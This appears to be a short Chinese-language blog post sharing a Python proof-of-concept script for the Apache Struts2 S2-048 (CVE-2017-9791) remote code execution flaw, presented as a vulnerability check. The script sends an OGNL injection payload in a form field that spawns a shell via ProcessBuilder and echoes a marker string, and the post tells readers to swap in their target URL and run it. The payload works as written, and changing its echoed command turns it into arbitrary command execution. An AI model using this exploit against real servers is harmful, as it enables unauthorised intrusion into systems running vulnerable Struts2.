Struts2 s2-048 POC

最新Apache Struts2（S2-048, CVE-2017-9791）远程代码执行漏洞刚刚发布，分享一下漏洞验证的POC代码，欢迎大家交流学习，漏洞危害较高，希望大家尽快检查相关服务是否存在漏洞。

#!/usr/bin/python   #coding=utf-8    ''' s2-048 poc '''  import urllib   import urllib2    def post(url, data):       req = urllib2.Request(url)       data = urllib.urlencode(data)       #enable cookie       opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())       response = opener.open(req, data)       return response.read()    def main():       posturl = "http://www.test.com/struts2-showcase/integration/saveGangster.action"     data = {'name':"${(#dm=@/u006Fgnl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#ef='echo s2-048-EXISTS').(#iswin=(@/u006Aava.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#efe=(#iswin?{'cmd.exe','/c',#ef}:{'/bin/bash','-c',#ef})).(#p=new /u006Aava.lang.ProcessBuilder(#efe)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", 'age':'bbb', '__checkbox_bustedBefore':'true', 'description':'ccc'}       res = post(posturl, data)[:100]     if 's2-048-EXISTS' in res:         print posturl, 's2-048 EXISTS'     else:         print posturl, 's2-048 do not EXISTS'  if __name__ == '__main__':       main() 

使用验证方法：

替换posturl为测试的目标地址，运行python脚本即可验证是否存在漏洞